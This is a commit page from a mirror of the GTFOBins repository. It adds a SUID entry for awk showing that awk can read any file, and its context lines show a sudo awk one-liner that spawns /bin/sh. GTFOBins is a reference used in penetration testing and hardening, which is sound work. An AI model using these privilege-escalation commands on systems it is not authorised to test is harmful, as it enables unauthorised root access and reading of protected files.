mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Add SUID category to awk
This commit is contained in:
parent
a48303c2b9
commit
fd719bb4b6
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
awk '//' "$LFILE"
|
awk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
awk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
Loading…
Reference in New Issue
Block a user